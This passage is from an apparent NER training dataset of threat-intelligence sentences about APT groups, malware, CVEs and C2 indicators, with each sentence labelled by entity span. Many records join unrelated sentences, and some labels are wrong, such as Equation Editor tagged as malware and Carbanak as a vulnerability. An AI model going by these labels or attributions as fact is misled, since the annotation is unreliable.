Today , the governments of the United States , United Kingdom , Australia , Canada , New Zealand and Japan have all announced that the government of North Korea is responsible for the activities of ZINC/Lazarus .", "spans": {"THREAT_ACTOR: OilRig": [[223, 229]], "MALWARE: Clayslide delivery documents": [[237, 265]], "ORGANIZATION: governments": [[507, 518]], "THREAT_ACTOR: ZINC/Lazarus": [[693, 705]]}, "info": {"id": "cyberner_stix_train_004428", "source": "cyberner_stix_train"}} {"text": "By integrating the findings with prior research , it was possible to connect MONSOON directly with infrastructure used by the HANGOVER group via a series of strong connections . In late September 2015 Mofang used the website of Myanmara 's national airline hosted at www.flymna.com for an attack against an organization in Myanmar .", "spans": {"THREAT_ACTOR: MONSOON": [[77, 84]], "THREAT_ACTOR: HANGOVER group": [[126, 140]]}, "info": {"id": "cyberner_stix_train_004429", "source": "cyberner_stix_train"}} {"text": "Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org . The presence of code to exfiltrate data to removable drives when there is physical access to a compromised computer may indicate that Machete operators could have a presence in one of the targeted countries , although we cannot be certain . During this heist , APT38 waited for a holiday weekend in the respective countries to increase the likelihood of hiding the transactions from banking authorities .", "spans": {"THREAT_ACTOR: Machete": [[276, 283]], "ORGANIZATION: we": [[360, 362]], "THREAT_ACTOR: APT38": [[403, 408]], "ORGANIZATION: banking": [[525, 532]]}, "info": {"id": "cyberner_stix_train_004430", "source": "cyberner_stix_train"}} {"text": "Manufacturers should be keeping close tabs on what software ends up on their devices . 
Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , EQNEDT32.exe , scores high for potentially malicious activity . C2 : log.gokickes.com .", "spans": {"VULNERABILITY: CVE-2017-1182": [[174, 187]], "MALWARE: Microsoft Equation Editor": [[205, 230]], "MALWARE: EQNEDT32.exe": [[233, 245]], "TOOL: C2": [[297, 299]], "DOMAIN: log.gokickes.com": [[302, 318]]}, "info": {"id": "cyberner_stix_train_004431", "source": "cyberner_stix_train"}} {"text": "Since the initial appearance of Operation AppleJeus , we can see that over time the authors have changed their modus operandi considerably .", "spans": {}, "info": {"id": "cyberner_stix_train_004432", "source": "cyberner_stix_train"}} {"text": "While the report appears to contain numerous inaccuracies , some of the indicators of compromises are legitimate and appear to be correctly attributed to Sofacy .", "spans": {"THREAT_ACTOR: Sofacy": [[154, 160]]}, "info": {"id": "cyberner_stix_train_004433", "source": "cyberner_stix_train"}} {"text": "We suspect that the group sought access to these networks to obtain information that would enable it to monitor communications passing through the providers' systems . 
The threat actors target a wide range of organizations : CTU researchers have observed TG-3390 actors obtaining confidential data on defense manufacturing projects , but also targeting other industry verticals and attacking organizations involved in international relations .", "spans": {"ORGANIZATION: CTU": [[225, 228]], "THREAT_ACTOR: TG-3390": [[255, 262]]}, "info": {"id": "cyberner_stix_train_004434", "source": "cyberner_stix_train"}} {"text": "Unfortunately , we can’t get all the related files as some payloads were only executed in memory .", "spans": {}, "info": {"id": "cyberner_stix_train_004435", "source": "cyberner_stix_train"}} {"text": "Researchers from the IBM X-Force Incident Response and Intelligence Services ( IRIS ) team identified a missing link in the operations of a threat actor involved in recent Shamoon malware attacks against Gulf state organizations .", "spans": {"ORGANIZATION: IBM X-Force Incident Response and Intelligence Services ( IRIS ) team": [[21, 90]]}, "info": {"id": "cyberner_stix_train_004436", "source": "cyberner_stix_train"}} {"text": "In the image below , we see a log TrickMo sent to the attacker upon becoming the default SMS app . The Poseidon Group actively targets this sort of corporate environment for the theft of intellectual property and commercial information , occasionally focusing on personal information on executives . In this case , the attackers maintained a presence on the target 's network for nearly six months between September 2016 and March 2017 .", "spans": {"MALWARE: TrickMo": [[34, 41]], "THREAT_ACTOR: Poseidon Group": [[103, 117]], "ORGANIZATION: executives": [[287, 297]]}, "info": {"id": "cyberner_stix_train_004437", "source": "cyberner_stix_train"}} {"text": "For example , we found a piece of a particularly sophisticated Android ransomware with novel techniques and behavior , exemplifying the rapid evolution of mobile threats that we have also observed on other platforms . 
One interesting note about the criminal activity of Gorgon Group is their usage of Bitly . . The differences between commercial spyware and digital extortion attacks You may have received an email something like , “ We know you ’ve visited this adult website .", "spans": {"SYSTEM: Android": [[63, 70]], "THREAT_ACTOR: Gorgon Group": [[270, 282]], "TOOL: Bitly": [[301, 306]], "TOOL: commercial spyware": [[335, 353]], "THREAT_ACTOR: digital extortion attacks": [[358, 383]]}, "info": {"id": "cyberner_stix_train_004438", "source": "cyberner_stix_train"}} {"text": "RATANKBA is delivered to its victims using a variety of lure documents , including Microsoft Office documents , malicious CHM files , and different script downloaders . We believe that it is likely threat actors will continue development Bookworm , and will continue to use it for the foreseeable future .", "spans": {"TOOL: RATANKBA": [[0, 8]], "TOOL: Microsoft Office documents": [[83, 109]], "TOOL: CHM files": [[122, 131]], "MALWARE: Bookworm": [[238, 246]]}, "info": {"id": "cyberner_stix_train_004439", "source": "cyberner_stix_train"}} {"text": "Therefore , “ Agent Smith ” decompiles both the original application and the malicious payload and fuses them together . It is thus interesting to see Buhtrap add strategic web compromises to their arsenal . This is the first of several instances of Dexphot employing living-off-the-land techniques , the use of legitimate system processes for nefarious purposes . Now , there is a potential new competitor in the \" fake updates \" landscape that looks strangely familiar .", "spans": {"MALWARE: Agent Smith": [[14, 25]], "MALWARE: Dexphot": [[250, 257]]}, "info": {"id": "cyberner_stix_train_004440", "source": "cyberner_stix_train"}} {"text": "APT40 engages in broader regional targeting against traditional intelligence targets , especially organizations with operations in Southeast Asia . 
The Infy group also appears to engage in espionage activities against foreign governments and businesses .", "spans": {"THREAT_ACTOR: APT40": [[0, 5]], "THREAT_ACTOR: Infy group": [[152, 162]], "ORGANIZATION: governments": [[226, 237]], "ORGANIZATION: businesses": [[242, 252]]}, "info": {"id": "cyberner_stix_train_004441", "source": "cyberner_stix_train"}} {"text": "Zen 's rooting trojan apps target a specific device model with a very specific system image . In this case , it was a group commonly referred to as \" Nitro \" , which was coined by Symantec in its 2011 whitepaper . They sent spear phishing messages with the subject “ 2015 Taiwan Security and Cultural Forum Invitation Form ” , and used a different tool – a tool that we refer to as DOORJAMB – in their attempt to compromise the organization . Talos Takes Ep .", "spans": {"MALWARE: Zen": [[0, 3]], "ORGANIZATION: Symantec": [[180, 188]], "MALWARE: DOORJAMB": [[382, 390]], "ORGANIZATION: Talos": [[443, 448]]}, "info": {"id": "cyberner_stix_train_004442", "source": "cyberner_stix_train"}} {"text": "But our researchers have predicted that these small Trojans would certainly be used to download some really bad malware that can actually harm the owners of the infected devices . In this report , we'll review how the NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . 
In recent OilRig attacks , the threat actors purport to be legitimate service providers offering service and technical troubleshooting as a social engineering theme in their spear-phishing attacks .", "spans": {"TOOL: NetTraveler": [[218, 229]], "VULNERABILITY: CVE-2012-0158": [[251, 264]], "TOOL: NetTraveler Trojan": [[280, 298]], "THREAT_ACTOR: actors": [[339, 345]], "ORGANIZATION: legitimate service providers": [[360, 388]], "ORGANIZATION: social engineering": [[441, 459]]}, "info": {"id": "cyberner_stix_train_004443", "source": "cyberner_stix_train"}} {"text": "They have also been seen using Heartbleed vulnerability in order to directly get valid credentials . MoneyTaker has primarily been targeting card processing systems , including the AWS CBR ( Russian Interbank System ) and purportedly SWIFT ( US ) .", "spans": {"VULNERABILITY: Heartbleed vulnerability": [[31, 55]]}, "info": {"id": "cyberner_stix_train_004444", "source": "cyberner_stix_train"}} {"text": "BrainTest leverages an anti-uninstall watchdog that uses two system applications to monitor the removal of one of the components and reinstall the component . Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) . 
Once executed , tactical malware contains the capability to profile the network and manoeuvre through it to identify a key system of interest .", "spans": {"MALWARE: BrainTest": [[0, 9]], "VULNERABILITY: anti-uninstall watchdog": [[23, 46]], "TOOL: .doc files": [[213, 223]], "MALWARE: RTF documents": [[244, 257]], "VULNERABILITY: CVE-2017-8570": [[282, 295]], "VULNERABILITY: Composite": [[298, 307]], "VULNERABILITY: Moniker": [[308, 315]], "ORGANIZATION: network": [[392, 399]]}, "info": {"id": "cyberner_stix_train_004445", "source": "cyberner_stix_train"}} {"text": "and addressed to Yahya Al-Sinwar , who Hamas elected as its leader in Gaza in February 2017 .", "spans": {"ORGANIZATION: Hamas": [[39, 44]]}, "info": {"id": "cyberner_stix_train_004446", "source": "cyberner_stix_train"}} {"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . In Russia , there were several relatively large cybercriminal groups engaged in financial theft via attacks on RBS .", "spans": {"ORGANIZATION: security firm": [[17, 30]], "ORGANIZATION: military officials": [[63, 81]], "VULNERABILITY: Adobe Reader vulnerability": [[153, 179]]}, "info": {"id": "cyberner_stix_train_004447", "source": "cyberner_stix_train"}} {"text": ") Technical Analysis App Name : TikTok Pro Hash : 9fed52ee7312e217bd10d6a156c8b988 Package Name : com.example.dat.a8andoserverx Upon installation , the spyware portrays itself as TikTok using the name TikTok Pro . Gamaredon Group infects victims using malicious attachments , delivered via spear phishing techniques . 
Winnti Linux variant ’s core functionality is within ‘ libxselinux ’ .", "spans": {"SYSTEM: TikTok Pro": [[32, 42], [201, 211]], "SYSTEM: TikTok": [[179, 185]], "THREAT_ACTOR: Gamaredon Group": [[214, 229]], "TOOL: malicious attachments": [[252, 273]], "MALWARE: Winnti": [[318, 324]], "SYSTEM: Linux": [[325, 330]], "MALWARE: libxselinux": [[373, 384]]}, "info": {"id": "cyberner_stix_train_004448", "source": "cyberner_stix_train"}} {"text": "This process is defined in the app ’ s AndroidManifest.xml config file , as shown in the following snippet . This was the first instance we have observed of APT41 targeting pro-democracy groups in Hong Kong . Our visibility into the operations of APT28 - a group we believe the Russian government sponsors - has given us insight into some of the government 's targets , as well as its objectives and the activities designed to further them .", "spans": {"THREAT_ACTOR: APT41": [[157, 162]], "ORGANIZATION: pro-democracy": [[173, 186]], "THREAT_ACTOR: APT28": [[247, 252]], "ORGANIZATION: Russian government": [[278, 296]], "ORGANIZATION: government": [[346, 356]]}, "info": {"id": "cyberner_stix_train_004449", "source": "cyberner_stix_train"}} {"text": "Recognizing the significance of this threat group , Unit 42 continues to track the evolution of Nigerian cybercrime under the code name SilverTerrier . It's possible TG-3390 used a waterhole to infect data center employees .", "spans": {"THREAT_ACTOR: threat group": [[37, 49]], "ORGANIZATION: Unit 42": [[52, 59]], "THREAT_ACTOR: SilverTerrier": [[136, 149]], "THREAT_ACTOR: TG-3390": [[166, 173]], "ORGANIZATION: data center employees": [[201, 222]]}, "info": {"id": "cyberner_stix_train_004450", "source": "cyberner_stix_train"}} {"text": "The mediaserver will first builds a new unique track , start to play the track , loop play all audio buffer , then finally stop the playback . 
Without any insight into the evidence Kaspersky has obtained , we can only repeat our view that Anunak has targeted only banks in Russia and we have no concrete reports of compromised banks outside of Russia directly related to this criminal group . As an example in the following obfuscated function , Ready to learn more about Malwarebytes for Business ?", "spans": {"ORGANIZATION: Kaspersky": [[181, 190]], "THREAT_ACTOR: Anunak": [[239, 245]], "ORGANIZATION: banks": [[264, 269], [327, 332]], "THREAT_ACTOR: criminal group": [[376, 390]], "TOOL: Malwarebytes for Business": [[472, 497]]}, "info": {"id": "cyberner_stix_train_004451", "source": "cyberner_stix_train"}} {"text": "According to security 360 Threat Intelligence Center , Goldmouse was observed deploying the nebulous njRAT backdoor . While the URL acts similarly to how eye-watch.in : 443 delivers payloads , we also saw the URL leveraging and exploiting security flaws in Flash : CVE-2015-8651 , CVE-2016-1019 , and CVE-2016-4117 .", "spans": {"ORGANIZATION: 360 Threat Intelligence Center": [[22, 52]], "MALWARE: njRAT backdoor": [[101, 115]], "TOOL: Flash": [[257, 262]], "VULNERABILITY: CVE-2015-8651": [[265, 278]], "VULNERABILITY: CVE-2016-1019": [[281, 294]], "VULNERABILITY: CVE-2016-4117": [[301, 314]]}, "info": {"id": "cyberner_stix_train_004452", "source": "cyberner_stix_train"}} {"text": "For example , numerous malware families register themselves as services during installation to guarantee persistence across reboots .", "spans": {}, "info": {"id": "cyberner_stix_train_004453", "source": "cyberner_stix_train"}} {"text": "r1-r4 : This is a local privilege escalation ( root ) exploit , which includes : CVE-2013-6282 , camerageroot ( http : //www.77169.org/exploits/2013/20130414031700 ) , a rooting tool for mtk6592 and addtional exploit . 
In total , PLATINUM made use of four zero-day exploits during these two attack campaigns ( two remote code execution bugs , one privilege escalation , and one information disclosure ) , showing an ability to spend a non-trivial amount of resources to either acquire professionally written zero-day exploits from unknown markets , or research and utilize the zero-day exploits themselves . DragonOK appears to operate out of China 's Jiangsu Province .", "spans": {"VULNERABILITY: CVE-2013-6282": [[81, 94]], "THREAT_ACTOR: PLATINUM": [[230, 238]], "VULNERABILITY: zero-day exploits": [[256, 273], [508, 525], [577, 594]], "THREAT_ACTOR: DragonOK": [[608, 616]]}, "info": {"id": "cyberner_stix_train_004454", "source": "cyberner_stix_train"}} {"text": "The threat actors steal data from compromised systems over a long period of time , which likely indicates a long-term objective of monitoring the target's network .", "spans": {}, "info": {"id": "cyberner_stix_train_004455", "source": "cyberner_stix_train"}} {"text": "Dropper payload – downloader DLL Internal name : msdetltemp.dll File format : PE32 DLL File size : 73 728 bytes MD5: f6f88caf49a3e32174387cacfa144a89 Linker version : 11.0 , Microsoft Visual Studio Linker timestamp : 2015.02.10 07:20:02 ( GMT ) Exported functions :", "spans": {"TOOL: DLL": [[29, 32], [83, 86]], "FILEPATH: msdetltemp.dll": [[49, 63]], "FILEPATH: f6f88caf49a3e32174387cacfa144a89": [[117, 149]], "ORGANIZATION: Microsoft": [[174, 183]], "TOOL: Visual Studio": [[184, 197]], "TOOL: GMT": [[239, 242]]}, "info": {"id": "cyberner_stix_train_004456", "source": "cyberner_stix_train"}} {"text": "In 2014 , Unit 42 released a report titled \" 419 Evolution \" that documented one of the first known cases of Nigerian cybercriminals using malware for financial gain . 
The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": {"ORGANIZATION: Unit 42": [[10, 17]], "THREAT_ACTOR: cybercriminals": [[118, 132]], "THREAT_ACTOR: attackers": [[172, 181]], "TOOL: emails": [[196, 202]], "FILEPATH: XLS files": [[228, 237]], "ORGANIZATION: employees working in the banking sector": [[241, 280]]}, "info": {"id": "cyberner_stix_train_004457", "source": "cyberner_stix_train"}} {"text": "Once launched , null will first verify whether it is able to fork on the system and that there is no other instance of itself currently running by checking whether the local port number 6842 is available . It has conducted attacks on similar organizations in Saudi Arabia , likely because of the access that those organizations have . Daily_Report.docx : The Winnti group diversified its targets to include enterprises such as those in pharmaceutics and telecommunications .", "spans": {"FILEPATH: Daily_Report.docx": [[335, 352]], "THREAT_ACTOR: Winnti group": [[359, 371]], "ORGANIZATION: enterprises": [[407, 418]], "ORGANIZATION: pharmaceutics": [[436, 449]], "ORGANIZATION: telecommunications": [[454, 472]]}, "info": {"id": "cyberner_stix_train_004458", "source": "cyberner_stix_train"}} {"text": "The payload will execute shell code to steal data from various applications . The attackers have taken great care to stay under the radar , imitating another attack group in the region . 
The group has heavily targeted the gaming industry , but it has also expanded the scope of its targeting .", "spans": {"THREAT_ACTOR: attackers": [[82, 91]]}, "info": {"id": "cyberner_stix_train_004459", "source": "cyberner_stix_train"}} {"text": "However , among our Downeks samples , we found new versions apparently written in .NET .", "spans": {"MALWARE: Downeks": [[20, 27]], "TOOL: .NET": [[82, 86]]}, "info": {"id": "cyberner_stix_train_004460", "source": "cyberner_stix_train"}} {"text": "“ .clic ” and “ k ( ) ; ” ) . We suspect that the group sought access to these networks to obtain information that would enable it to monitor communications passing through the providers' systems . ZXHttpProxy Run a HTTP proxy server on the workstation . It is still unclear whether its authors have any links to known cybercrime organizations .", "spans": {"THREAT_ACTOR: authors": [[287, 294]], "THREAT_ACTOR: cybercrime organizations": [[319, 343]]}, "info": {"id": "cyberner_stix_train_004461", "source": "cyberner_stix_train"}} {"text": "Figure 25 : infected Android version distribution To further analyze “ Agent Smith ” ’ s infection landscape , we dived into the top 10 infected countries : Country Total Devices Total Infection Event Count Avg . Back in February , Trend Micro noted the similarities between the Patchwork and Confucius groups and found that , in addition to the similarities in their malware code , both groups primarily went after targets in South Asia . The domain address usually ends in a .info or .net TLD , while the file name for the actual payload consists of random characters , similar to the randomness previously seen being used to generate file names and scheduled tasks . 
In this case , Mandiant observed the process w3wp.exe , ( the IIS process associated with the Exchange web front - end ) spawning cmd.exe to write a file to disk .", "spans": {"SYSTEM: Android": [[21, 28]], "MALWARE: Agent Smith": [[71, 82]], "ORGANIZATION: Trend Micro": [[232, 243]], "THREAT_ACTOR: Patchwork": [[279, 288]], "THREAT_ACTOR: Confucius groups": [[293, 309]], "DOMAIN: .info": [[477, 482]], "DOMAIN: .net": [[486, 490]], "ORGANIZATION: Mandiant": [[685, 693]]}, "info": {"id": "cyberner_stix_train_004462", "source": "cyberner_stix_train"}} {"text": "Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . Curiously , Bahamut appears to track password attempts in response to failed phishing attempts or to provoke the target to provide more passwords .", "spans": {"VULNERABILITY: CVE-2017-11882": [[66, 80]], "MALWARE: 'NavShExt.dll'": [[147, 161]], "MALWARE: iexplore.exe": [[192, 204]]}, "info": {"id": "cyberner_stix_train_004463", "source": "cyberner_stix_train"}} {"text": "The new class is called NotificationListener and extends the NotificationListenerService class . By relying on a native PDF command to navigate to a new URL , Zirconium successfully circumvented Chrome 's anti-redirect protection . APT12 has previously used the THREEBYTE backdoor . 
Proxy : Multi - hop Proxy A backdoor used by APT29 created a Tor hidden service to forward traffic from the Tor client to local ports 3389 ( RDP ) , 139 ( Netbios ) , and 445 ( SMB ) enabling full remote access from outside the network and has also used TOR .004", "spans": {"THREAT_ACTOR: APT12": [[232, 237]], "MALWARE: THREEBYTE backdoor": [[262, 280]], "MALWARE: Multi - hop Proxy A backdoor": [[291, 319]], "THREAT_ACTOR: APT29": [[328, 333]], "TOOL: TOR": [[537, 540]]}, "info": {"id": "cyberner_stix_train_004464", "source": "cyberner_stix_train"}} {"text": "Since Shamoon incidents feature the infiltration and escalation stages of targeted attacks , X-Force IRIS responders sought out the attackers ’ entry point .", "spans": {"TOOL: X-Force IRIS responders": [[93, 116]]}, "info": {"id": "cyberner_stix_train_004465", "source": "cyberner_stix_train"}} {"text": "Kaspersky Lab products detect it as Trojan.AndroidOS.Dvmap.a . If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs . In the RevengeHotels campaign , the downloaded files are .NET binaries protected with the Yoda Obfuscator . 
Uncovering weaknesses in Apple macOS and VMWare vCenter : 12 vulnerabilities in RPC implementation •", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]], "MALWARE: bot": [[68, 71]], "THREAT_ACTOR: RevengeHotels": [[219, 232]], "FILEPATH: .NET": [[269, 273]], "MALWARE: Yoda Obfuscator": [[302, 317]], "SYSTEM: Apple macOS": [[345, 356]], "SYSTEM: VMWare vCenter": [[361, 375]]}, "info": {"id": "cyberner_stix_train_004466", "source": "cyberner_stix_train"}} {"text": "DHS has previously released Alert TA14-353A , which contains additional details on the use of a server message block ( SMB ) worm tool employed by these actors .", "spans": {"ORGANIZATION: DHS": [[0, 3]], "MALWARE: worm": [[125, 129]]}, "info": {"id": "cyberner_stix_train_004467", "source": "cyberner_stix_train"}} {"text": "The agent appears to have been under development for at least five years and consists of three stages . From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space . 
From January 2018 to March 2018 , through FireEye 's Dynamic Threat Intelligence , we observed attackers leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East .", "spans": {"VULNERABILITY: Carbanak": [[114, 122]], "ORGANIZATION: banks": [[159, 164]], "ORGANIZATION: electronic payment": [[169, 187]], "ORGANIZATION: space": [[229, 234]], "ORGANIZATION: FireEye 's Dynamic Threat Intelligence": [[279, 317]], "THREAT_ACTOR: attackers": [[332, 341]]}, "info": {"id": "cyberner_stix_train_004468", "source": "cyberner_stix_train"}} {"text": "These entities are not regionally congruent , and the only shared victimology involves their organizational functions .", "spans": {}, "info": {"id": "cyberner_stix_train_004469", "source": "cyberner_stix_train"}} {"text": "The Trojan allows the criminals to remotely control the victim ’ s computer and is capable of recording sound from a microphone . The backdoor will load the encrypted configuration file and decrypt it , then use Secure Sockets Layer ( SSL ) protocol to connect to command-and-control ( C&C ) servers . This suggests that this config is added manually to the sample after having been built . 
As we commonly see in the ransomware space , this threat is delivered through a variety of mechanisms which can include phishing and being dropped as secondary payloads from command and control ( C2 ) frameworks like Cobalt Strike .", "spans": {"TOOL: Secure Sockets Layer": [[212, 232]], "TOOL: SSL": [[235, 238]], "TOOL: command-and-control": [[264, 283]], "TOOL: Cobalt Strike": [[608, 621]]}, "info": {"id": "cyberner_stix_train_004470", "source": "cyberner_stix_train"}} {"text": "As is common for malware , the GeminiDuke infostealer uses a mutex to ensure that only one instance of itself is running at a time .", "spans": {"MALWARE: GeminiDuke": [[31, 41]], "TOOL: infostealer": [[42, 53]]}, "info": {"id": "cyberner_stix_train_004471", "source": "cyberner_stix_train"}} {"text": "These campaigns differ in tools , server infrastructure , and nuances in decoy content and intended targets .", "spans": {}, "info": {"id": "cyberner_stix_train_004472", "source": "cyberner_stix_train"}} {"text": "Note that in almost all cases , this payload file , contained in zip archives , is named ‘ setting ’ or ‘ setting.o ’ . While investigating KerrDown we found multiple RAR files containing a variant of the malware . Magic Hound is an Iranian-sponsored threat group operating primarily in the Middle East that dates back as early as 2014 .", "spans": {"MALWARE: KerrDown": [[140, 148]], "ORGANIZATION: we": [[149, 151]], "THREAT_ACTOR: Magic Hound": [[215, 226]]}, "info": {"id": "cyberner_stix_train_004473", "source": "cyberner_stix_train"}} {"text": "APT15 was targeting information related to UK government departments and military technology . 
Other samples were found bearing a compilation time as early as June 2012 and version 00002 .", "spans": {"THREAT_ACTOR: APT15": [[0, 5]], "ORGANIZATION: government": [[46, 56]], "ORGANIZATION: military technology": [[73, 92]]}, "info": {"id": "cyberner_stix_train_004474", "source": "cyberner_stix_train"}} {"text": "EventBot loaded library Loaded library as seen in Logcat . After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft’s Equation Editor (EQNEDT32) . FireEye has identified APT35 operations dating back to 2014 .", "spans": {"MALWARE: EventBot": [[0, 8]], "MALWARE: RTF files": [[111, 120]], "VULNERABILITY: CVE-2018-0798": [[141, 154]], "ORGANIZATION: FireEye": [[213, 220]], "THREAT_ACTOR: APT35": [[236, 241]]}, "info": {"id": "cyberner_stix_train_004475", "source": "cyberner_stix_train"}} {"text": "The threat group also reportedly targeted the German parliament and German Chancellor Angela Merkel's Christian Democratic Union party .", "spans": {}, "info": {"id": "cyberner_stix_train_004476", "source": "cyberner_stix_train"}} {"text": "A successful network intrusion can have severe impacts , particularly if the compromise becomes public and sensitive information is exposed .", "spans": {}, "info": {"id": "cyberner_stix_train_004477", "source": "cyberner_stix_train"}} {"text": "Previous versions were storing config values within the variables of a class , while the latest version is using SharedPreferences with some of the keys being identical to those used by Anubis : isAccessibility time_work time_start_permission url_inj Conclusion Ginp is a simple but rather efficient banking Trojan providing the basic functionality to be able to trick victims into delivering personal information . Our research partner Rapid7 investigated the Dropbox use and found that the attackers had used the same account to store exfiltrated data from a global apparel company . 
Another subdomain , bbs.softfix.co.kr was hosted on same IP address as bbs.gokickes.com , which was reported as the C2 server of Invader by Cyphort .", "spans": {"SYSTEM: Anubis": [[186, 192]], "MALWARE: Ginp": [[262, 266]], "ORGANIZATION: Rapid7": [[437, 443]], "TOOL: Dropbox": [[461, 468]], "THREAT_ACTOR: attackers": [[492, 501]], "DOMAIN: bbs.softfix.co.kr": [[606, 623]], "DOMAIN: bbs.gokickes.com": [[657, 673]], "TOOL: C2": [[702, 704]], "MALWARE: Invader": [[715, 722]], "ORGANIZATION: Cyphort": [[726, 733]]}, "info": {"id": "cyberner_stix_train_004478", "source": "cyberner_stix_train"}} {"text": "While attribution of malware attacks is rarely simple or conclusive , during the course of this investigation I uncovered evidence that suggests the attacker might be affiliated with the state-sponsored group known as Sofacy Group ( also known as APT28 or Operation Pawn Storm ) .", "spans": {"THREAT_ACTOR: Sofacy": [[218, 224]], "THREAT_ACTOR: APT28": [[247, 252]], "THREAT_ACTOR: Operation Pawn Storm": [[256, 276]]}, "info": {"id": "cyberner_stix_train_004479", "source": "cyberner_stix_train"}} {"text": "WildFire detects all SofacyCarberp payloads with malicious verdicts .", "spans": {"ORGANIZATION: WildFire": [[0, 8]], "MALWARE: SofacyCarberp": [[21, 34]]}, "info": {"id": "cyberner_stix_train_004480", "source": "cyberner_stix_train"}} {"text": "The group's Cobalt Strike installation typically uses a payload named svchost.exe in an attempt to disguise Cobalt Strike activity as the legitimate Windows svchost.exe executable .", "spans": {"TOOL: Cobalt Strike": [[12, 25], [108, 121]], "FILEPATH: svchost.exe": [[70, 81], [157, 168]], "SYSTEM: Windows": [[149, 156]]}, "info": {"id": "cyberner_stix_train_004481", "source": "cyberner_stix_train"}} {"text": "We have tracked and profiled this group through multiple investigations , endpoint and network detections , and continuous monitoring .", "spans": {}, "info": {"id": "cyberner_stix_train_004482", "source": 
"cyberner_stix_train"}} {"text": "The zero-day vulnerability found and reported by Symantec (CVE-2019-0703) occurs due to the way the Windows SMB Server handles certain requests . Bahamut was shown to be resourceful , not only maintaining their own Android malware but running propaganda sites , although the quality of these activities varied noticeably .", "spans": {"ORGANIZATION: Symantec": [[49, 57]], "VULNERABILITY: (CVE-2019-0703)": [[58, 73]], "THREAT_ACTOR: Bahamut": [[146, 153]], "SYSTEM: Android": [[215, 222]], "MALWARE: malware": [[223, 230]]}, "info": {"id": "cyberner_stix_train_004483", "source": "cyberner_stix_train"}} {"text": "The server-side component provides a simple graphical user interface for threat actors interacting with web shells .", "spans": {"TOOL: web shells": [[104, 114]]}, "info": {"id": "cyberner_stix_train_004484", "source": "cyberner_stix_train"}} {"text": "The first document – dated April 10 , 2017 – is marked “ Very Secret ”", "spans": {}, "info": {"id": "cyberner_stix_train_004485", "source": "cyberner_stix_train"}} {"text": "Dell SecureWorks Counter Threat Unit (TM ) ( CTU ) researchers investigated activities associated with Threat Group-3390 ( TG-3390 ) .", "spans": {"ORGANIZATION: Dell": [[0, 4]], "ORGANIZATION: SecureWorks Counter Threat Unit": [[5, 36]], "ORGANIZATION: CTU": [[45, 48]], "THREAT_ACTOR: Threat Group-3390": [[103, 120]]}, "info": {"id": "cyberner_stix_train_004486", "source": "cyberner_stix_train"}} {"text": "The Word document usually exploits CVE-2012-0158 . 
LAS VEGAS—Today at the Black Hat information security conference , Dell SecureWorks researchers unveiled a report on a newly detected hacking group that has targeted companies around the world while stealing massive amounts of industrial data .", "spans": {"MALWARE: Word document": [[4, 17]], "VULNERABILITY: CVE-2012-0158": [[35, 48]], "ORGANIZATION: Dell SecureWorks": [[118, 134]]}, "info": {"id": "cyberner_stix_train_004487", "source": "cyberner_stix_train"}} {"text": "While you would virtually never see Western intelligence agencies going after the same target without de-confliction for fear of compromising each other ’s operations , in Russia this is not an uncommon scenario . “ Putin ’s Hydra : Inside Russia ’s Intelligence Services ” , a recent paper from European Council on Foreign Relations , does an excellent job outlining the highly adversarial relationship between Russia ’s main intelligence services – FSB , the primary domestic intelligence agency but one with also significant external collection and ‘ active measures ’", "spans": {"ORGANIZATION: FSB": [[451, 454]]}, "info": {"id": "cyberner_stix_train_004488", "source": "cyberner_stix_train"}} {"text": "This functionality can be seen in Figure 1 . As can be observed in the illustration above , the makeself script is instructed to run ./setup.sh after unpacking . Embedded in this sample ’s configuration three command-and-control server addresses and two additional strings we believe to be campaign designators .", "spans": {"MALWARE: makeself script": [[96, 111]], "MALWARE: ./setup.sh": [[133, 143]]}, "info": {"id": "cyberner_stix_train_004489", "source": "cyberner_stix_train"}} {"text": "January 2016 – May 2018 : In this stage , “ Agent Smith ” hackers started to try out 9Apps as a distribution channel for their adware . This algorithm was previously discussed by security researchers in a Confucius-related blog post . 
Its goal is a very common one in cybercriminal circles — to install a coin miner that silently steals computer resources and generates revenue for the attackers — yet Dexphot exemplifies the level of complexity and rate of evolution of even everyday threats , intent on evading protections and motivated to fly under the radar for the prospect of profit . The activity we have observed , coupled with others in the information security industry , indicate that these threat actors are likely using Exchange Server vulnerabilities to gain a foothold into environments .", "spans": {"MALWARE: Agent Smith": [[44, 55]], "MALWARE: Dexphot": [[402, 409]], "THREAT_ACTOR: threat actors": [[702, 715]]}, "info": {"id": "cyberner_stix_train_004490", "source": "cyberner_stix_train"}} {"text": "The “ core ” module communicates with the C & C server , receiving the predetermined list of popular apps to scan the device for . So far , Unit 42 has seen infrastructure overlaps with servers hosting C2 servers for samples of the FFRAT , PlugX , Poison Ivy and Scieron Trojans , suggesting that the threat actors use these tools as the payload in their attacks . 1 、An installer with two URLs ; Scheduled Task / Job : Scheduled Task APT29 has used named and hijacked scheduled tasks to establish persistence .", "spans": {"ORGANIZATION: Unit 42": [[140, 147]], "TOOL: FFRAT": [[232, 237]], "TOOL: PlugX": [[240, 245]], "TOOL: Poison Ivy": [[248, 258]], "TOOL: Scieron Trojans": [[263, 278]], "THREAT_ACTOR: Scheduled Task APT29": [[420, 440]]}, "info": {"id": "cyberner_stix_train_004491", "source": "cyberner_stix_train"}} {"text": "Using similar traits , such as copycat iconography and app or package names , victims are likely socially engineered into installing the malicious apps , especially when available on so-called third-party ( i.e . The BalkanDoor backdoor does not implement any exfiltration channel . 
